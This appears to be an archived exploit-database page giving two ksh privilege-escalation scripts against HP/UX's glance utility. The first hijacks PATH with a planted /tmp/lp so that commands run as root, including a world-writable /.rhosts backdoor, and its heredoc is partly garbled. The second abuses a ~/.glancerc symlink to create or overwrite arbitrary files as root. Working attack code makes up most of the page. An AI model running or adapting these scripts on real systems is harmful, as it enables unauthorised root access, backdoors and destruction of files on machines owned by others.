More HP/UX glance vulnerabilities

Summary
Description:A couple more old glance vulnerabilities
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable glance, maybe 9.x or 10.x
Date:Unknown
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

--exploit 1: glance-lp

#!/bin/ksh
# the other .traz

GLANCE=/usr/perf/bin/glance

# Put any commands you want into /tmp/lp, and they'll be run as root, basically
cat > /tmp/lp <> /.rhosts
chmod 666 /.rhosts
EOF

echo "Please wait about 10 or 15 seconds for your commands to run"
chmod 777 /tmp/lp
PATH=/tmp:$PATH
export PATH
${GLANCE} -j 1 -p bob -iterations 1 -maxpages 1 > /dev/null 2>&1
rm /tmp/lp

--exploit 2: glance-rc
#!/bin/ksh
# the one .traz

FILE=$1
PROGGIE=`basename $0`
GLANCE=/usr/perf/bin/glance

if [ -z "$1" ]
then
  echo "usage: $PROGGIE file_to_create_or_overwrite"
  exit
fi

if [ -f ~/.glancerc ]
then
  mv ~/.glancerc ~/.glancerc.old
fi

umask 0
ln -s $FILE ~/.glancerc
if [ -f $FILE ]
then
  echo "File exists -- will be overwritten with garbage"
else
  echo "File doesn't exist -- will be created mode 666"
  CREATE_666="yes"
fi
echo "Please wait about 10 seconds or so"
${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1
if [ -n "${CREATE_666}" ]
then
  >$FILE
fi

rm ~/.glancerc
if [ -f ~/.glancerc.old ]
then
  mv ~/.glancerc.old ~/.glancerc
fi



More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]